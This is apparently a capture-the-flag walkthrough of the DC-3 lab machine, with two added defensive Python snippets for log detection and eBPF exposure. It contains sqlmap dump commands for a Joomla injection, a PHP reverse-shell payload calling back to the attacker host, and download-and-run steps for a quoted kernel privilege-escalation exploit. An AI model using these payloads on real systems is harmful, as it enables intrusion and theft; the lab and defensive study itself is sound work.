After opening the OVA file, I could not find DC-3's IP address no matter what; the network card was probably the problem.
So the first step is to configure the network card.
At the boot-menu screen shown above, press e.
Replace the ro here with rw single init=/bin/bash
Press Ctrl+X to boot into the command line.
Check the current NIC IP information with ip a; the NIC name is ens33.
Edit the NIC configuration file with vim /etc/network/interfaces (the NIC name written there does not match the real one).
Restart the networking service with /etc/init.d/networking restart, then run ip a again.
You can see that it now has an IP.
nmap -sP 192.168.146.0/24 #host discovery
nmap -A 192.168.146.0/24 #service and version scan
Scan to find out which CMS it is.
python3 cmseek.py -u 192.168.146.145 #available on GitHub
It reports that no core vulnerabilities were detected, so let's Google to see whether there are other vulnerabilities.
https://www.exploit-db.com/exploits/42033
Testing the site myself confirmed that there really is SQL injection.
http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1
http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1%27
Detailed write-up: https://www.anquanke.com/post/id/86119
Having found an SQL injection vulnerability, go straight to sqlmap.
sqlmap -u "http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] #enumerate databases
sqlmap -u "http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb --tables #enumerate tables
sqlmap -u "http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' --columns #enumerate columns
sqlmap -u "http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' -C id,name,password,username --dump #dump the fields
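From the defender's side, the injection point above is easy to spot in web-server logs: a legitimate Joomla list[fullordering] value is only ever "column ASC" or "column DESC". The following detector is an added example, not part of the original post; the access-log lines are constructed, and the two probe values in them are exactly the ones the walkthrough uses (1%27 and updatexml).

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common Apache/nginx "combined" access-log layout (only the fields we need).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# A benign Joomla list[fullordering] value is just "<column> ASC|DESC".
LEGIT_ORDERING = re.compile(r"^[a-z_][a-z0-9_.]*\s+(asc|desc)$", re.I)
# Tokens that have no business in an ordering clause.
SUSPICIOUS = re.compile(r"['\"()]|\b(updatexml|extractvalue|union|select|sleep|benchmark)\b", re.I)

# Constructed sample log lines (not from the original post).
SAMPLE_LOG = [
    '192.168.146.132 - - [10/Apr/2019:10:01:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.name+ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.146.132 - - [10/Apr/2019:10:01:05 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1%27 HTTP/1.1" 500 712 "-" "Mozilla/5.0"',
    '192.168.146.132 - - [10/Apr/2019:10:01:09 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml HTTP/1.1" 500 712 "-" "sqlmap/1.3"',
    '10.0.0.7 - - [10/Apr/2019:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

def find_fullordering_injection(log_lines):
    """Return one finding per request whose list[fullordering] value is not a plain ordering clause."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip it rather than abort the sweep
        qs = parse_qs(urlsplit(m.group("url")).query, keep_blank_values=True)
        for value in qs.get("list[fullordering]", []):
            value = unquote(value).strip()  # second decode catches double-encoded probes
            if LEGIT_ORDERING.match(value):
                continue
            reason = "sql token" if SUSPICIOUS.search(value) else "unexpected format"
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "status": int(m.group("status")), "value": value, "reason": reason})
    return findings

if __name__ == "__main__":
    for finding in find_fullordering_injection(SAMPLE_LOG):
        print(finding)
```

The allow-list-first approach means a new payload that avoids every keyword in SUSPICIOUS is still flagged, just with the weaker "unexpected format" reason.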
The administrator's hashed password: $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
So the next idea is to see whether this password can be cracked.
There are two options here: Kali's john or johnny. The former is command-line, the latter has a graphical interface. Let's try both.
Once we have the admin account's password, log in and take a look.
There is nothing much there; we probably need to go in through the back end. We already scanned out the admin directory earlier: http://192.168.146.145/administrator/
Under Extensions-Templates there are a lot of php files.
Just create a new php file and find the file's directory to test it.
Found the directory: http://192.168.146.145/templates/protostar/A1oe.php
The code executes successfully. Next, go straight for a reverse shell.
<?php $sock=fsockopen('192.168.146.132',4444); $descriptorspec=array( 0=>$sock, 1=>$sock, 2=>$sock ); $process=proc_open('sh',$descriptorspec,$pipes); proc_close($process); echo phpinfo(); ?>
Then listen with nc -lvvp 4444, and visit http://192.168.146.145/templates/protostar/A1oe.php to get a shell.
Take a look at the Linux version: /etc/*-release
Ubuntu 16.04 has kernel vulnerabilities that allow direct privilege escalation; use searchsploit to see whether one can be used directly.
Also check the kernel version: uname -a
Pick a matching one and try it. I chose 39772.txt here.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime, unprivileged code can use the bpf() syscall to load eBPF socket filter programs. These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first function that touches the supplied eBPF instructions is replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF map file descriptors and looks up pointers for the corresponding map files. This is done as follows:

    /* look for pseudo eBPF instructions that access map FDs and
     * replace them with actual map pointers */
    static int replace_map_fd_with_map_ptr(struct verifier_env *env)
    {
        struct bpf_insn *insn = env->prog->insnsi;
        int insn_cnt = env->prog->len;
        int i, j;

        for (i = 0; i < insn_cnt; i++, insn++) {
            [checks for bad instructions]
            if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
                struct bpf_map *map;
                struct fd f;
                [checks for bad instructions]
                f = fdget(insn->imm);
                map = __bpf_map_get(f);
                if (IS_ERR(map)) {
                    verbose("fd %d is not pointing to valid bpf_map\n", insn->imm);
                    fdput(f);
                    return PTR_ERR(map);
                }
                [...]
            }
        }
        [...]
    }

__bpf_map_get contains the following code:

    /* if error is returned, fd is released.
     * On success caller should complete fd access with matching fdput() */
    struct bpf_map *__bpf_map_get(struct fd f)
    {
        if (!f.file)
            return ERR_PTR(-EBADF);
        if (f.file->f_op != &bpf_map_fops) {
            fdput(f);
            return ERR_PTR(-EINVAL);
        }
        return f.file->private_data;
    }

The problem is that when the caller supplies a file descriptor number referring to a struct file that is not an eBPF map, both __bpf_map_get() and replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If __fget_light() detected that the file descriptor table is shared with another task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause the reference count of the struct file to be over-decremented, allowing an attacker to create a use-after-free situation where a struct file is freed although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with memory debugging options is attached as crasher.tar.

One way to exploit this issue is to create a writable file descriptor, start a write operation on it, wait for the kernel to verify the file's writability, then free the writable file and open a readonly file that is allocated in the same place before the kernel writes into the freed file, allowing an attacker to write data to a readonly file. By e.g. writing to /etc/crontab, root privileges can then be obtained.

There are two problems with this approach:

The attacker should ideally be able to determine whether a newly allocated struct file is located at the same address as the previously freed one. Linux provides a syscall that performs exactly this comparison for the caller: kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to pause code execution in the kernel between the writability check of the target file and the actual write operation. This can be done by abusing the writev() syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays read accesses, then mmap()s a file containing a struct iovec from that FUSE filesystem and passes the result of mmap() to writev(). (Another way to do this would be to use the userfaultfd() syscall.) writev() calls do_writev(), which looks up the struct file * corresponding to the file descriptor number and then calls vfs_writev(). vfs_writev() verifies that the target file is writable, then calls do_readv_writev(), which first copies the struct iovec from userspace using import_iovec(), then performs the rest of the write operation. Because import_iovec() performs a userspace memory access, it may have to wait for pages to be faulted in - and in this case, it has to wait for the attacker-owned FUSE filesystem to resolve the pagefault, allowing the attacker to suspend code execution in the kernel at that point arbitrarily.

An exploit that puts all this together is in exploit.tar. Usage:

    user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
    user@host:~/ebpf_mapfd_doubleput$ ./doubleput
    starting writev
    woohoo, got pointer reuse
    writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
    suid file detected, launching rootshell...
    we have root privs now...
    root@host:~/ebpf_mapfd_doubleput# id
    uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Use it as follows:
root@kali:~/tmp# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip #download the zip
root@kali:~/tmp# unzip * #extract the zip
root@kali:~/tmp# cd 39772/ #enter the directory
Then upload and extract it, or have the target wget it directly (place it in the attacking machine's web directory).
tar xvf exploit.tar #extract
bash compile.sh
ls
./doubleput
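The advisory quoted above names two preconditions for this attack surface: a kernel >= 4.4 with CONFIG_BPF_SYSCALL, and kernel.unprivileged_bpf_disabled left at 0. The following exposure check is an added example, not from the original post or the exploit; the kernel release string used in the sample run is constructed, and the only system path it assumes is the stock /proc sysctl file.

```python
import os
import re

MIN_AFFECTED = (4, 4)  # the advisory: unprivileged bpf() program loading exists "in Linux >=4.4"
SYSCTL_PATH = "/proc/sys/kernel/unprivileged_bpf_disabled"

def parse_kernel_release(release):
    """'4.4.0-21-generic' -> (4, 4, 0). Raises ValueError on an unparsable string."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(x or 0) for x in m.groups())

def assess_unprivileged_bpf(release, sysctl_value, bpf_syscall_compiled=True):
    """Classify exposure of the unprivileged bpf() surface from the advisory's
    preconditions. Returns {'exposed': bool, 'reason': str}."""
    if not bpf_syscall_compiled:
        return {"exposed": False, "reason": "CONFIG_BPF_SYSCALL not set: bpf() is unavailable"}
    # 1 = disabled permanently; 2 (kernels >= 5.15) = disabled but re-enableable by root.
    if sysctl_value.strip() in ("1", "2"):
        return {"exposed": False, "reason": "kernel.unprivileged_bpf_disabled is set"}
    ver = parse_kernel_release(release)
    if ver < MIN_AFFECTED:
        return {"exposed": False, "reason": f"kernel {release} predates unprivileged eBPF loading"}
    # Distro kernels backport fixes without bumping the version, so the version alone
    # cannot prove the double-fdput bug is present; it does prove the surface is reachable.
    return {"exposed": True,
            "reason": f"kernel {release} >= 4.4 with unprivileged bpf() enabled; "
                      "set kernel.unprivileged_bpf_disabled=1 and confirm the fix commit is applied"}

def assess_live_system():
    """Read the live values on a Linux host (assumes the stock /proc sysctl path)."""
    with open(SYSCTL_PATH) as f:
        sysctl_value = f.read()
    return assess_unprivileged_bpf(os.uname().release, sysctl_value)

if __name__ == "__main__":
    # Constructed inputs in the shape of an Ubuntu 16.04 kernel, not read from DC-3.
    print(assess_unprivileged_bpf("4.4.0-21-generic", "0"))
    print(assess_unprivileged_bpf("4.4.0-21-generic", "1"))
```

Setting the sysctl closes the unprivileged path to this bug class as a whole, which is why it is worth enforcing even on kernels that already carry the fix commit.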
This target was quite a pain... After downloading and opening the OVA file I simply could not find the target's IP address, so I downloaded the VM-specific version, but I am on VMware Workstation and could not use that either... I did not want to download yet another piece of software, so I shelved it for a while. Later, after looking things up online plus some exploring of my own, I found that a misconfigured network card was what prevented it from getting an IP address, and worked through it step by step. As for what I learned: two password-cracking tools, john and johnny. And this was, I think, the first time since starting the DC series that I have used a kernel exploit to escalate privileges. (exciting.jpg)